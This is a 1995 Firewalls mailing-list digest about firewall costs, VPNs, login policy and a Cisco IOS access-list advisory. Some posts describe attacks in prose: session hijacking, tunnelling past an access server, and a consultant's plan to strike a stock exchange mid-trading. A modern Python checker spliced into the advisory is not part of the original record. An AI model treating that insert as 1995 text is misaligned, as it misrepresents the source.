As far as attack from the Internet side goes, if you allow unrestricted outgoing IP from the Access server, then one of your Access Server users (eg. John) might be able to fire up an Appletalk tunnel from behind the Access server to anyone on the outside, providing access to your Appletalk network. See ftp://munnari.oz.au/multigate/ for source for an Appletalk tunnel [munnari is a busy box - be gentle].
mike
--
mikec@cyber.com.au
information...it's all yours...it's all mine...you just have to find the time..flick between realities, there's more to this than anything that you or I can see.... ........Zeroes and ones will take us there.

From firewalls-owner Fri Aug 4 00:01:53 1995
From: Mark
Subject: Re: preventing password accidents.
To: Firewalls@GreatCircle.COM
Date: Fri, 4 Aug 1995 16:18:50 +1000

>If they're using S/Key, then how is this a problem anyway? They enter
>the one-time password and it's invalid for the next login. I don't see
>the problem.

Consider session hijacking (shadowing is a more accurate description). An intruder can easily take your session, send in a binary, su and run it, and give you back your session in less than five seconds. Usually passwds are irrelevant anyway, as there are just so many root holes that once they are on the machine it is gone.
If you are targeted by someone that is suitably equipped, all you will see is a net freeze for 5 seconds whilst they followed your legal connection in and compromised you. Once they are on a machine you enter another from, it's over. Thirty seconds after that you won't find the slightest trace of them. Welcome to the internet.

Cheers,
Mark

From firewalls-owner Fri Aug 4 01:30:32 1995
From: ppi@rpdata.com.au ("Phil Pierotti - Database Administrator")
Organization: RP Data Pty Ltd
To: firewalls@GreatCircle.COM
Date: Fri, 4 Aug 1995 18:06:01 +1000
Subject: Re: IPWatcher (Where to get it)

here it is, for those who want it

ftp://coast.cs.purdue.edu/pub/tools/unix/ttywatcher

------------------------------------------------------------
Be Realistic: Plan for a Miracle.
Bhagwan Shree Rajneesh.
------------------------------------------------------------
Phil Pierotti                         ppi@rpdata.com.au
Systems Administrator                 RP Data Pty Ltd
Phone +61 2 893 8255                  Sydney, Australia
Fax   +61 2 893 8663
=============================================================

From firewalls-owner Fri Aug 4 04:30:03 1995
From: Darren Reed
Subject: Re: preventing password accidents.
To: rick@TIS.COM (Rick Murphy)
Date: Fri, 4 Aug 1995 21:23:07 +1000 (EST)
Cc: Firewalls@GreatCircle.COM (Firewalls Mailing List)

In some mail from Rick Murphy, sie said:
>
> >What I'd like to propose is that firewalls and other systems which
> >require the use of reusable passwords take preventative measures,
> >to stop a potentially harmful/critical password being entered across
> >an insecure medium. ie if it sees the username "root" given to the
> >"login:" prompt, it drops the connection immediately with no
> >"Password:" prompt sent back.
>
> The problem with this approach is that you've given a potential cracker
> some information - cracking root isn't helpful. You've actually made their
> job easier.
>
> What you want to do with any net access attempt to "root" is to set off loud
> alarms - and ignore the access - but avoid looking to the person trying the
> account like you know what they're doing. Let them waste their time while
> you try to track them back to the source.

Anyone who tries to login as "root" to Unix knows what it is unless they are the victim of a con. I'd almost put that in the "too stupid to worry about" basket; almost but not quite. And if they're not successful, then the source site is not going to give anything away: all crackers worth anything know that certain things are bound to ring alarms.

I don't care about giving away which accounts are and aren't useful; the aim is to stop reusable passwords, which could have an impact on the system's integrity if discovered, from being entered "accidentally". The best way to accomplish this is to not make entering the password an available option, IMHO. s/key solves the problem of when you need to enter a password and you know that it may be captured, which is not the same.

Accepting all username/password pairs the same (except that s/key will show up as different in some cases) would appear to me as a classic case of security through obscurity - and everyone but a 3-letter org. knows how bad that is, right ?
:)

darren

From firewalls-owner Fri Aug 4 05:40:25 1995
Date: Fri, 4 Aug 95 08:23:04 EDT
From: Frederick M Avolio
To: firewalls@greatcircle.com
Subject: Job Openings in TIS Firewalls Group (BRIEF)

ftp://ftp.tis.com/users/avolio/fwjobs.html

Respond as indicated, not to the list. [Brent okayed this posting.
:-)]

f

From firewalls-owner Fri Aug 4 06:00:59 1995
From: "Maiwald, Eric"
To: Firewalls List
Subject: RE: Cost of implementing a firewall
Date: Fri, 04 Aug 95 08:43:00 PDT

>Hello:
>For those of you who have implemented a commercial firewall package I would
>appreciate if you could share your experiences as to how much resources does
>it take to administer it, hardware costs, and looking back what do you think
>you ended up paying (including hidden costs and manpower.)? According to the
>vendors it takes very little to administer it but I would really like to get
>your viewpoint - especially when I am talking about thousands of users.
>Regards
>Vivek

Vivek,

In a previous life I had the job of setting up and administering several commercial firewalls. They were all from the same vendor. In general, the hardware and software costs are not hidden. They are well defined and they vary. To give you an idea using two commercial products - TIS sells their Gauntlet system with the platform for about $15k.
At the other end, ANS will lease their system with a platform for something over $20k per month (they also sell it, but the numbers on that escape me). The choice of the initial cost and vendor have a lot to do with how you will use the system.

Administering the system will also depend on how you will use it. If you are planning to set it up and let it run with no outgoing user authentication, it is not very time consuming once you are up to speed. If every internal user requires an ID/PW, then you have to figure out how many changes (adds, deletes, modifies) you will have per week. Depending on the system, you may have to add/delete accounts, help users with forgotten passwords, and add mail entries for incoming/outgoing mail. In short, it becomes a system admin job for some number of users.

Another part of the costs deals with the review of the audit logs. I considered this part of my job to be rather important and I examined the logs each morning. Depending on the traffic of the previous day, it could take me five minutes or two hours.

I hope this is helpful for you.

Eric
------------------------------------------------------------------
Eric Maiwald                                     maiwalde@nasd.com
Senior Information Security Specialist
National Association of Securities Dealers
All opinions are my own and do not necessarily represent the views of my employer.
------------------------------------------------------------------

From firewalls-owner Fri Aug 4 06:19:09 1995
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Subject: (fwd) Cisco Security Advisory (July 31, 1995)
To: firewalls@greatcircle.com (Firewalls List)
Date: Fri, 4 Aug 1995 08:37:40 -0500 (EST)

Since I hadn't already seen this post come across this group. FYI.

- paul

Cisco Security Advisory (July 31, 1995)

CIO Topic: SECURITY ADVISORY PLEASE READ for Important Internetwork News
Posted : Aug 3 16:48:28 1995

Cisco Security Advisory
-----------------------
Mon Jul 31 16:24:28 1995

The following describes an error in Cisco's IOS software 10.3 release when the 'tacacs-ds' or 'tacacs' keyword is used in extended IP access control lists. This bug can cause an extended IP access control list to be misparsed, possibly allowing unauthorized packets to circumvent a filtering router.

This vulnerability is present in the following IOS software versions:

    10.3(3.4) through 10.3(4.2)

If you are running any of these IOS versions on a product that uses IP extended access lists, and you are using the 'tacacs-ds' or 'tacacs' keyword in these lists, then Cisco strongly recommends that you review your access lists to ensure that they have been parsed correctly.
You can determine what version of IOS you are running by issuing the following command:

    show version

If your access list has been parsed incorrectly, the recommended action is to upgrade to a more recent version of IOS or perform the workaround described below.

The bug is fixed in the following official software releases:

    10.3(4.3) or later

(For reference, the Cisco update identifier for this fix is "CSCdi36962".)

Customers may obtain software upgrades without going through Cisco's Technical Assistance Center via Cisco's Customer Information On-Line service; instructions for downloading are available at the end of this message. You may also contact your Cisco distributor or contact Cisco's Technical Assistance Center (TAC) for more information. TAC can be reached by phone at 800-553-2447, by E-Mail to tac@cisco.com or via the World-Wide-Web at http://www.cisco.com. In Europe you can contact TAC by phone at 32-2-778-42-42 or via E-Mail to euro-tac@cisco.com.

===========================================================================

A) Description

A bug in certain versions of IOS can cause extended IP access lists to be parsed incorrectly. Under some circumstances, this may allow packets to bypass IP packet filtering. This may permit unintended IP traffic to pass through a filtering router.

IP extended access lists between versions 10.3(1) through 10.3(3.3) used the keyword 'tacacs-ds'. This keyword could be saved as part of the router configuration either in non-volatile memory on the router or on an external TFTP server. Configuration files written by these versions which are read by versions 10.3(3.4) through 10.3(4.2) will not have the 'tacacs-ds' keyword parsed correctly. The result will be that the entire line in the access list will be ignored. An error message will be generated when this occurs. Loss of such a line from the access list may create a vulnerability if the access list is used as part of a packet filter.
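The advisory's check is to compare the intended configuration with what the router actually holds, since an entry rejected at parse time simply disappears from the filter. The script below is an added example, not Cisco tooling: it extracts the access-list entries from two constructed IOS config fragments (hostname and addresses are made up), treats 'tacacs-ds', 'tacacs' and port 49 as the same thing the way the advisory does, reports entries that are missing from the running configuration, and applies the keyword rewrite of the workaround.

```python
"""Check an IOS extended access list against the tacacs-ds parsing bug.

Added example (not Cisco tooling).  It applies the advisory's own decision
rule: compare the access-list entries in the intended configuration with
those in the current (running) configuration, treating the keywords
'tacacs-ds' and 'tacacs' and the numeric port 49 as equivalent, and
report entries that the affected IOS versions would have dropped.
The configurations below are constructed samples.
"""
import re

TACACS_PORT = "49"                      # TCP/UDP port TACACS listens on
TACACS_KEYWORDS = ("tacacs-ds", "tacacs")
PORT_OPERATORS = ("eq", "neq", "lt", "gt", "range")
ACL_RE = re.compile(r"^\s*access-list\s+(\d+)\s+(.*\S)\s*$")

# Constructed: what the administrator wrote under an older 10.3 release.
INTENDED_CONFIG = """\
hostname border-rtr
access-list 101 deny tcp any any eq tacacs-ds
access-list 101 permit tcp any host 10.1.1.6 eq 25
access-list 101 permit ip any any
"""

# Constructed: the same file as an affected release holds it after rejecting
# the line it could not parse (the advisory says the whole line is ignored
# and an error message is generated).
CURRENT_CONFIG = """\
hostname border-rtr
access-list 101 permit tcp any host 10.1.1.6 eq 25
access-list 101 permit ip any any
"""


def normalize(rule):
    """Rewrite any spelling of the TACACS port that follows a port operator
    to the single token 'tacacs', so equivalent entries compare equal."""
    tokens = rule.split()
    out = []
    for i, tok in enumerate(tokens):
        after_op = i > 0 and tokens[i - 1] in PORT_OPERATORS
        if after_op and (tok in TACACS_KEYWORDS or tok == TACACS_PORT):
            out.append("tacacs")
        else:
            out.append(tok)
    return " ".join(out)


def acl_entries(config):
    """(acl number, normalized rule) for every access-list line in config."""
    entries = []
    for line in config.splitlines():
        m = ACL_RE.match(line)
        if m:
            entries.append((m.group(1), normalize(m.group(2))))
    return entries


def uses_tacacs_ds(config):
    """True if any access-list line still carries the old 'tacacs-ds' keyword."""
    return any(ACL_RE.match(line) and re.search(r"\btacacs-ds\b", line)
               for line in config.splitlines())


def missing_entries(intended, current):
    """Entries present in the intended ACLs but absent from the current ones,
    in the order the intended configuration lists them."""
    have = set(acl_entries(current))
    return [e for e in acl_entries(intended) if e not in have]


def assess(intended, current):
    """Apply the advisory's three cases and return one verdict string."""
    # A TACACS-related entry that should be there but is not: the filter
    # is already running without that line.
    dropped = [e for e in missing_entries(intended, current)
               if "tacacs" in e[1].split()]
    if dropped:
        return "vulnerable"
    # The running config still spells the keyword the old way: fine today,
    # but loading it under 10.3(3.4)-10.3(4.2) would drop those lines.
    if uses_tacacs_ds(current):
        return "do not upgrade"
    return "not vulnerable"


def apply_workaround(config):
    """The advisory's workaround: re-enter the entries with 'tacacs' in
    place of 'tacacs-ds'.  Lines that are not access-list entries are kept."""
    fixed = []
    for line in config.splitlines():
        if ACL_RE.match(line):
            line = re.sub(r"\btacacs-ds\b", "tacacs", line)
        fixed.append(line)
    return "\n".join(fixed) + "\n"


if __name__ == "__main__":
    print("verdict:", assess(INTENDED_CONFIG, CURRENT_CONFIG))
    for number, rule in missing_entries(INTENDED_CONFIG, CURRENT_CONFIG):
        print(f"missing from access-list {number}: {rule}")
    print(apply_workaround(INTENDED_CONFIG), end="")
```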
To determine if you are vulnerable, examine your current configuration and compare it to your intended configuration.

If the access lists in your current configuration and your intended configuration do not use the keyword 'tacacs-ds', you are not vulnerable. You do not need to do anything.

If your current configuration contains the keyword 'tacacs-ds', you should NOT upgrade that router to any version of IOS between 10.3(3.4) and 10.3(4.2). You are not currently vulnerable.

If your intended configuration contains the keywords 'tacacs-ds', 'tacacs', or filters on TCP or UDP port 49, and your current configuration does NOT contain this line of the access list, you are currently vulnerable. You should perform the workaround described below.

B) Workaround

The following actions will remove the vulnerability:

- Delete the access list and re-enter it based upon your intended configuration. Do not enter the 'tacacs-ds' keyword. Use the keyword 'tacacs' instead.

C) Solution

Obtain and install the appropriate release of IOS software as described above. For assistance contact Cisco's TAC.

===========================================================================

Software upgrades may be obtained via any of the following mechanisms:

A) World Wide Web (WWW):

For registered CIO users please open a URL to:

    http://cio.cisco.com/kobayashi/Library_root.shtml

and select the version of software to download.

For non-registered users open a URL to:

    http://cio.cisco.com/public/library/spc_req.shtml

When prompted for a code, please enter: certjuly31 for a list of available files to download.

B) FTP:

    ftp cio.cisco.com

and at the initial (username) prompt, enter: certjuly31
At the password prompt, enter your e-mail address. Then:

    get README.certjuly31

This file contains a list of files available that close this vulnerability. Please examine this list to determine which files you need and then download them.
C) Character-based "CIO Classic":

For access, the following connection options are offered:

  o telnet cio.cisco.com
  o Dial-up modem
    + In Europe +33 1 64 46 40 82
    + In the US (408) 526 8070
    + vt100, N81, up to 14.4Kbps

Enter either as a guest or registered user and navigate to the topic: Software Updates Special Files

At the prompt for a code, please enter: certjuly31

A list of files will be displayed for you to select and download.

- --
_______________________________________________________________________________
Paul Ferguson                               US Sprint
tel: 703.689.6828                           Managed Network Engineering
internet: paul@hawk.sprintmrn.com           Reston, Virginia USA
http://www.sprintmrn.com

From firewalls-owner Fri Aug 4 07:00:45 1995
Date: Fri, 4 Aug 1995 09:53:29 -0400 (EDT)
From: mht
To: Frederick M Avolio
Cc: firewalls@greatcircle.com
Subject: Re: Job Openings in TIS Firewalls Group (BRIEF)

Frederick,

Are you sure this is the correct URL:????

On Fri, 4 Aug 1995, Frederick M Avolio wrote:

> ftp://ftp.tis.com/users/avolio/fwjobs.html
>
> Respond as indicated, not to the list. [Brent okayed this posting. :-)]
>
> f
>

Colvard's Logical Premises:
        All probabilities are 50%. Either a thing will happen or it won't.
Colvard's Unconscionable Commentary:
        This is especially true when dealing with someone you're attracted to.
Grelb's Commentary:
        Likelihoods, however, are 90% against you.

From firewalls-owner Fri Aug 4 07:32:21 1995
From: Greg Brennan
To: firewalls mailing list
Subject: FW: Virtual Private Network Enabling Technologies
Date: Fri, 04 Aug 95 09:18:00 CDT

>Subject: Virtual Private Network Enabling Technologies
>Date: August 3, 1995 02:20PM
>
>A couple of weeks ago we had a discussion about virtual private networks
>running on top of the Internet. Does anyone have a list or web site with the
>enabling technologies to implement VPNs? I'll take any references including
>white papers and commercial recommendations.
>
>Steve
>--
>Steve Lodin (317)451-0479
>Delco Electronics Corporation http://www.cs.purdue.edu/people/swlodin
>Information & Systems Protection Purdue University COAST Project
>swlodin@delcoelect.com swlodin@cs.purdue.edu

"The Security Router" from Network Systems Corp. allows the construction of VPNs over the internet.
The Security Router uses NSC's Data Privacy Facility (DPF) which incorporates the following cryptographic features:

- Authentication and key exchange (a la RSA and Diffie-Hellman, 512 and 1024 bit keys)
- Digital Signatures (using Message Digest 5)
- Replay prevention
- Data Compression,
- and of course...Encryption (DES, Triple DES, IDEA, and the Network Systems Cyper 1 (NSC1) algorithm, which has high performance characteristics (>7Mb/s) and may be exported).

Since VPNs may connect a single site to multiple different sites that each have their own security requirements (encryption algorithms, authentication etc.), it is critical to have the ability to sort the data leaving each site into various classes in order to determine which cryptographic parameters to apply. Packet filters in routers can be extremely useful here. Network Systems has a very high performance filtering capability known as "NetSentry". It can filter traffic based on host, subnet, source/destination address, protocol, or application (at all 7 layers of the ISO model), or even time of day/day of week. When NetSentry is combined with Data Privacy Facility (DPF), administrators are provided with a lot of flexibility and capability (security wise) when designing the VPN.

Information on the hardware and software (DPF, NetSentry) may be obtained at Network Systems' web site at http://www.network.com

Thanks for asking.

Greg Brennan
________________________________
Greg Brennan                              | Network Systems Corp.
                                          | (Canadian Office)
Manager, Business Partner Solutions       | 5710 Timberlea Blvd., Suite 207
Internet: greg.brennan@network.com        | Mississauga, Ontario L4W 4W1
Voice: (905) 629-0440                     | "Secure Networks-On-Demand"TM
Fax: (905) 629-0435                       | http://www.network.com

From firewalls-owner Fri Aug 4 08:10:11 1995
Date: Fri, 04 Aug 95 08:56:00 CST
From: "Paul Osterwald"
To: Firewalls@GreatCircle.COM, kaplan@bpa.arizona.edu (Ray Kaplan)
Cc: padgett@tccslr.dnet.mmc.com
Subject: Re[2]: Sidewinder Challenge

To all:

As a former SEAL, I can tell you that the concept of PROPER planning is extremely important. The approach which you are discussing is not only the BEST approach, but the ONLY approach a professional would consider. When we would pull exercises to target and penetrate Naval installations, this was not done with a "gee, let's go mess with the kids this afternoon" attitude. The most important phase of any penetration operation is the planning stage.

Hopefully, we will see more meaningful discussion on this topic.
Respectfully,

Paul

"There may be a hundred combat postures, but there is only one purpose: to win"
Heiho Kaden Sho

______________________________ Reply Separator _________________________________
Subject: Re: Sidewinder Challenge
Author: kaplan@bpa.arizona.edu (Ray Kaplan) at Internet
Date: 8/3/95 4:13 PM

Padgett writes:

>mjr rites:
>> Rather than see "take a blindfolded shot at the system"
>>firewalls tests, I'd rather see: "here is a detail of our design,
>>take it and study the exact configuration you will be attacking
>>and come back in a week with testing tools" approach. Anything
>>else is security through obscurity, and hopefully we've learned
>>that that's not very good.

>I agree with Marcus with the additional comment: periodically I get requests
>from people to "try to break into system xxxx and see if it is secure".
>I always refuse (maybe why I haven't been promoted in ten years), not
>because there are any doubts that it can be done, but because Things May
>Get Broken in the process.

This parallels my experience and I agree. So, how do we move the status quo to our shared point of view? It seems that if we take some of these things one small step at a time, we can build a significant collection of war stories to support our position that everyone can use. ... Or, do we have to wait until one of us has the time / resources to do a book on the subject? Anyone know of good stories about attack efforts that went awry? I have a few that I'll share as I have time.

>The right way is to first study the system in question off line: the
>network configuration, the ACLs, the design rules. Once a good understanding
>of the concept is made, then study the policies involved (what ? you don't
>have any ? Then what am I testing ? - always have a sample set when you say
>this BTW).
>
>Next examine the perimeter for "leaks" - conduct a modem sweep. Call the
>phone company and ask about leased lines.
Sweep the network for unknown >nodes (have *never* seen a paper list that was up-to-date - have even found >entire unlisted subnets). > >At this point you should not have to do any penetration testing, you should >be able to predict all vulnerabilities. Of course you are going to need >to demonstrate them since no-one will believe you but there should not be >any element of doubt, you should know. Agreed. Now, you can see why I think we need an "Attack-a-thon" where people can see these first-order principals demonstrated *before* they bankrupt people like meand Marcus by jerking our chains for "system break-in quote RFP responses" and make people like you (who are credentialed in a formal manner) wonder why you aren't as successful as those who go do attacks? Seems that such "please come attack my system to prove that it is secure" only comes up with one, stupid and obvious problem to report which the client's management poo poos as noise. One attempt to change this status quo is reportedly being made at the DEFCON hacker conference this weekend in Vegas. Several interesting sessions seem to be focusing on explaining to "new" hackers that they need to clean up their acts and focus on more professional approaches. The reason that I bring this up, is that it seems that maybe one of my recurrent fantacies may be a reality soon. I have always wanted to do an attack on a commercial organization where-in I'd materially affect their business (maybe even improve it ;) ) and then use this possition to change the lay of the land. For instance, wouldn;t it be great if you walked into a board room and told thte CEO to get out of your chair since you now owned the place? Although I agree with your earlier point about: >Things May >Get Broken in the process. Im my own experience, a stock exchange once called for an attack on their firewall. I took them seriously and went to do my homework. 
I assembled critical mass (people, knowledge, and tools) to affect an attack goal: actually trade and move some money around. I'm pretty convinced that a dedicated attack that is properly designed, well funded, and well executed *WILL* succeed. As an example, during the L.A. riots, a friend commented that a well disiplined team of specialized criminals could have cleaned up amid the pandamonium by picking out selected jewlery stores and bank branches for professional heists. If nothing else, it seems that the frailty of most systems guarentees the success of a dedicated attack. The prospective client was horrified that I actually proposed to slip in and out during the heat of the middle of the trading day. Their idea was that I'd come on a Sunday and piddle with things when they were slow and they were affraid that they'd all loose their jobs *if* I succeeded. They weren't so much worried about my mucking up their production systems, but were more worried about this than seemed justified given that I proposed a surgical strike. >However, while the Sidewinder challenge is somewhat flawed technically, it >is good marketing particularly when the target is people with money who know >little/nothing about firewalls. You could have the best product in the world >but it will fail in the marketplace without effective marketing and I would >rather see the sales go to a product with potential like Sidewinder from an >in-depth company than to a one-trick-pony with a glossy GUI as happened in >the anti-virus market. No question there! One question that remains is how to keep this playing field level. >But then what would I know, am not particularly sucessful. Well, that depends on how you measure success. I - for one - have benifited greatly from your experience. (More kudos when I can take the time to say them right.) Meantime, how to collect and distill some of this for practical use in helping solve firewall (and general infrastructure security) problems for us all? 
I keep coming back to the idea that we need a hack-a-thon that is properly designed, executed, and reported. Or, am I just going to end up looking at another dusty journal of experience on a library shelf? While there is a good argument to be made for me to just go do this, I wonder if anyone would even take note. 'course, it may be that all we need is a good marketing / PR type to make this pretty enough to catch people's fancy and make it a dooable do? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Fri Aug 4 08:40:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23476 for firewalls-outgoing; Fri, 4 Aug 1995 08:11:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23421 for ; Fri, 4 Aug 1995 08:10:55 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma023408; Fri Aug 4 08:10:40 1995 Received: from relay.tis.com by neptune.TIS.COM id aa00934; 4 Aug 95 11:00 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma018265; Fri, 4 Aug 95 10:52:11 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA26980; Fri, 4 Aug 95 10:59:15 EDT Message-Id: <9508041459.AA26980@tis.com> From: Frederick M Avolio X-Organization: Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: firewalls mailing list Subject: Re: FW: Virtual Private Network Enabling Technologies Date: Fri, 04 Aug 95 10:59:14 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Not wanting to send product promotions to this list, I only replied to the original poster. But since I see other traffic on this... 
As one source of information, let me point people to TIS's home page (www.tis.com) and the firewalls papers contained therein. There are descriptions of what I called virtual network perimeter (what is being referred to now as a Virtual Private Network). Any firewall product, such as the Gauntlet Firewall, that supports firewall to firewall encryption can be used to set up a VPN. The requirement (and this is mentioned in one of my papers I think) should be obvious but often is not: if you are going to extend your network security perimeter to include other networks, they'd better share the same security policy, security posture, and administrative domain (management chain for example, not domain in the DNS sense). Fred From firewalls-owner Fri Aug 4 09:01:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25105 for firewalls-outgoing; Fri, 4 Aug 1995 08:59:13 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25061 for ; Fri, 4 Aug 1995 08:59:05 -0700 Received: from unknown(132.9.205.2) by miles via smap (V1.3) id sma025008; Fri Aug 4 08:58:47 1995 Received: from cs28-1.ellsworth.af.mil by ns.ellsworth.af.mil with SMTP (5.59/25-eef) id AA01680; Fri, 4 Aug 95 09:56:15 MDT Received: by cs28-1.ellsworth.af.mil with Microsoft Mail id <30224FD5@cs28-1.ellsworth.af.mil>; Fri, 04 Aug 95 09:50:29 PDT From: "Tucker, R., SrA, 28CS/SCSNS" To: "'firewalls-owner'" Subject: RE: Sanitizing SCSI disks Date: Fri, 04 Aug 95 09:51:00 PDT Message-Id: <30224FD5@cs28-1.ellsworth.af.mil> Encoding: 48 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Use Norton Wipedisk. Overwrite three times... that'll clear the media enough so that it can be deamed "unclassified." However, it *STILL* must remain in the DOD inventory for two years being *USED* in an unclassified mode before it can be released to the public. 
(The destruction certificate must also remain with the computer for two years.) This is approved up to and including TS. If you're a civilian, (and don't have to follow those requirements) just overwrite with Wipedisk three times. If what's on there makes you *THAT* paranoid, use Wipedisk 99 times. :*) ---------- From: firewalls-owner To: Firewalls Subject: Re: Sanitizing SCSI disks Date: Sunday, July 30, 1995 8:26AM > I see many posts about destroying disks since there is no > secure way to remove the classified data. If anyone is > interested, my company has written a SCSI disk overwrite > program which has been approved for use on data up to secret by > the Navy, Air Force, DIS and DISA. The product is called > UniShred Pro and works on Sun, HP, IBM and SGI workstations. Is that approved under the ISM or the NISPOM? The NISPOM takes effect July 31st. NISPOM requirements are much more restrictive regarding disk sanitization. Someone finally woke up and said, hey, if you can't overwrite revectored bad blocks you can't sanitize the media, you have to destroy it. ---------------------------------------------------------------------------- --- - "Crisis over, back to panic mode!" ---------------------------------------------------------------------------- --- - N.A. 
Bogart nabadm@odo.acdnj.itt.com OpenVMS & Security Systems Manager bogart@itt.com ITT Avionics (201) 284-5117 VOICE(MAIL) 100 Kingsland Road (201) 284-3947 FAX Clifton NJ 07014 (201) 730-2681 PAGER ---------------------------------------------------------------------------- --- - From firewalls-owner Fri Aug 4 10:20:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27539 for firewalls-outgoing; Fri, 4 Aug 1995 09:38:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27511 for ; Fri, 4 Aug 1995 09:37:56 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma027466; Fri Aug 4 09:37:29 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA26231; Fri, 4 Aug 95 12:28:41 -0400 Date: Fri, 4 Aug 95 12:28:40 -0400 Message-Id: <9508041628.AA26231@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Not a bug, a feature Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Are you sure this is the correct URL:???? (ref the TIS advert which I will not repeat) No, it is a test - if you can't download/read it, don't bother applying (not as strange as mjr's funny FTP ports though). While there, note Fred's .GIFs. 
Warmly, Padgett From firewalls-owner Fri Aug 4 10:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25699 for firewalls-outgoing; Fri, 4 Aug 1995 09:08:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25644 for ; Fri, 4 Aug 1995 09:08:16 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma025628; Fri Aug 4 09:07:47 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA26489; Fri, 4 Aug 95 12:02:30 EDT Date: Fri, 4 Aug 95 12:09:23 EST Message-Id: <9508041209.AA13212@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: firewalls@GreatCircle.COM Subject: Linux X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Any comments on using Linux as a firewall system? I'm thinking in terms as both a network filter and as a dial up solution. If anyone with experience in doing this (either successfully or not) could give some pointers it would be greatly appreciated. From firewalls-owner Fri Aug 4 11:01:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26335 for firewalls-outgoing; Fri, 4 Aug 1995 09:20:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26312 for ; Fri, 4 Aug 1995 09:20:32 -0700 Received: from unknown(146.155.224.4) by miles via smap (V1.3) id sma026305; Fri Aug 4 09:20:28 1995 Received: from pc_40 by rubik with smtp (Linux Smail3.1.28.1 #3) id m0sePSD-0006miC; Fri, 4 Aug 95 12:18 CST Message-Id: Date: Fri, 4 Aug 95 12:18 CST X-Sender: quito@rubik.constructa.cl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: quito@constructa.cl (Francisco Javier cabezas) Subject: about ipfwadm in Linux X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need to know something about IPFWADM.... 
What are "the blocking rules", "the forwarding rules" and "the IP accountting rules " ??? What's the mean ? Thanks for all. Quito. +-------------------------------+ | Francisco Javier Cabezas V. | | Desarrollo y Soporte Unix | | quito@constructa.cl | +-------------------------------+ From firewalls-owner Fri Aug 4 11:06:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26736 for firewalls-outgoing; Fri, 4 Aug 1995 09:25:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26690 for ; Fri, 4 Aug 1995 09:25:40 -0700 Received: from gatekeep.marconi.ca(198.168.197.34) by miles via smap (V1.3) id sma026644; Fri Aug 4 09:25:15 1995 Received: from av410a.mtl.marconi.ca by gatekeep.marconi.ca; (5.65/1.1.8.2/21Sep94-0917AM) id AA07687; Fri, 4 Aug 1995 12:24:01 -0400 Received: from av410a.mtl.marconi.ca by av410a.mtl.marconi.ca (PMDF V4.3-13 #3809) id <01HTOB1O5VU88Y5GXM@av410a.mtl.marconi.ca>; Fri, 04 Aug 1995 12:23:54 -0400 (EDT) Date: Fri, 04 Aug 1995 12:23:54 -0400 (EDT) From: Harold March Subject: MorningStar SecureConnect To: Firewalls@greatcircle.com Message-Id: <01HTOB1O6YF68Y5GXM@av410a.mtl.marconi.ca> Organization: Canadian Marconi Company X-Vms-To: IN%"Firewalls@greatcircle.com" X-Vms-Cc: MARCH Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk One of our remote sites wishes to obtain their own Internet connect and wants to use a MorningStar SecureConnect "firewall". As far as I can tell this is just a filtering router which does not give me the "warm & fuzzies" since this can probably be compromised more easily than the DEC SEAL firewall we have set up. Am I wrong to think that this is going to backdoor our net or should I think about firewalling off their site? Any MorningStar users out their who prefer their solution rather than the DMZ/Bastion host approach? 
